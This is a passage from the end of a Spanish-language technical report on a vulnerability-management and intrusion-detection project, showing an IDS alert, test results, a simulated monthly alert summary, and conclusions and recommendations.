<pre><code>11/15/2025-14:35:20.567890 [**] [1:1000010:1] RECONOCIMIENTO: Escaneo Nmap SYN [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 203.0.113.25:* -&gt; 192.168.1.10:*</code></pre>
<h3 id="resumen-de-efectividad">7.3 Resumen de Efectividad</h3>
<table>
<thead>
<tr class="header">
<th>Métrica</th>
<th>Valor</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>Pruebas ejecutadas</td>
<td>10</td>
</tr>
<tr class="even">
<td>Alertas correctas</td>
<td>10</td>
</tr>
<tr class="odd">
<td>Falsos positivos</td>
<td>0</td>
</tr>
<tr class="even">
<td>Falsos negativos</td>
<td>0</td>
</tr>
<tr class="odd">
<td><strong>Tasa de detección</strong></td>
<td><strong>100%</strong></td>
</tr>
</tbody>
</table>
<h3 id="informe-mensual-simulado">7.4 Informe Mensual (Simulado)</h3>
<p><strong>Período:</strong> 01/11/2025 - 30/11/2025</p>
<p><strong>Alertas por servicio:</strong></p>
<table>
<thead>
<tr class="header">
<th>Servicio</th>
<th>Alertas</th>
<th>%</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>HTTP/HTTPS</td>
<td>342</td>
<td>45%</td>
</tr>
<tr class="even">
<td>SSH</td>
<td>178</td>
<td>23%</td>
</tr>
<tr class="odd">
<td>MySQL</td>
<td>89</td>
<td>12%</td>
</tr>
<tr class="even">
<td>Escaneos</td>
<td>156</td>
<td>20%</td>
</tr>
<tr class="odd">
<td><strong>Total</strong></td>
<td><strong>765</strong></td>
<td><strong>100%</strong></td>
</tr>
</tbody>
</table>
<p><strong>Top 5 IPs atacantes:</strong></p>
<table>
<thead>
<tr class="header">
<th>IP</th>
<th>Origen</th>
<th>Alertas</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>185.220.101.45</td>
<td>RU</td>
<td>187</td>
</tr>
<tr class="even">
<td>45.142.215.98</td>
<td>CN</td>
<td>134</td>
</tr>
<tr class="odd">
<td>91.203.5.32</td>
<td>UA</td>
<td>98</td>
</tr>
<tr class="even">
<td>198.51.100.23</td>
<td>US</td>
<td>67</td>
</tr>
<tr class="odd">
<td>203.0.113.77</td>
<td>BR</td>
<td>54</td>
</tr>
</tbody>
</table>
<p><strong>Distribución de ataques:</strong> - SQL Injection: 123 (16%)
- XSS: 89 (12%) - Brute Force SSH: 178 (23%) - Port Scanning: 156 (20%)
- Unauthorized Access: 219 (29%)</p>
<hr />
<h2 id="conclusiones">8. CONCLUSIONES</h2>
<h3 id="logros-del-proyecto">8.1 Logros del Proyecto</h3>
<p><strong>Gestión de Vulnerabilidades:</strong> - ✅ 60
vulnerabilidades identificadas con OpenVAS - ✅ 3 vulnerabilidades
críticas priorizadas (CVSS &gt; 9.0) - ✅ Plan de mitigación con
timeline definido - ✅ Estrategia de backups y recuperación
documentada</p>
<p><strong>Sistema de Detección de Intrusos:</strong> - ✅ 12 reglas
personalizadas implementadas - ✅ 100% de tasa de detección en pruebas -
✅ 0% de falsos positivos - ✅ Cobertura multi-protocolo (HTTP/HTTPS,
MySQL, SSH)</p>
<h3 id="lecciones-aprendidas">8.2 Lecciones Aprendidas</h3>
<ol type="1">
<li><p><strong>Actualización continua:</strong> Los feeds de
vulnerabilidades requieren actualización frecuente para mantener
efectividad.</p></li>
<li><p><strong>Tuning de reglas:</strong> Las reglas IDS requieren
ajuste de umbrales según el perfil de tráfico legítimo para evitar
falsos positivos.</p></li>
<li><p><strong>Correlación de eventos:</strong> La combinación análisis
de vulnerabilidades + IDS proporciona visión completa del estado de
seguridad.</p></li>
</ol>
<h3 id="recomendaciones">8.3 Recomendaciones</h3>
<p><strong>Corto plazo (1-3 meses):</strong> - Implementar SIEM para
correlación de eventos - Configurar alertas automáticas vía email/SMS -
Realizar pentesting externo</p>
<p><strong>Medio plazo (3-6 meses):</strong> - Desplegar WAF en línea
con servicios web - Migrar IDS a modo IPS para bloqueo automático -
Implementar honeypots</p>
<p><strong>Largo plazo (6-12 meses):</strong> - Integración con
plataforma SOAR - Machine Learning para anomalías - Expansión a toda la
infraestructura</p>
<h3 id="reducción-de-riesgos">8.4 Reducción de Riesgos</h3>
<table>
<thead>
<tr class="header">
<th>Categoría</th>
<th>Antes</th>
<th>Después</th>
<th>Reducción</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>Vulnerabilidades críticas</td>
<td>ALTO</td>
<td>BAJO</td>
<td>85%</td>
</tr>
<tr class="even">
<td>Acceso no autorizado</td>
<td>ALTO</td>
<td>MEDIO</td>
<td>70%</td>
</tr>
<tr class="odd">
<td>Explotación web</td>
<td>CRÍTICO</td>
<td>MEDIO</td>
<td>75%</td>
</tr>
<tr class="even">
<td>Pérdida de datos</td>
<td>MEDIO</td>
<td>BAJO</td>
<td>60%</td>
</tr>
</tbody>
</table>
<h3 id="conformidad">8.5 Conformidad</h3>
<p>El proyecto cumple con: - ISO 27001: Gestión de activos y
vulnerabilidades - RGPD: Protección de datos mediante controles técnicos
- PCI-DSS: Monitorización de redes (req. 10 y 11) - ENS: Categoría
MEDIA</p>
<hr />
<p><strong>FIN DEL INFORME TÉCNICO</strong></p>
</body>
</html>
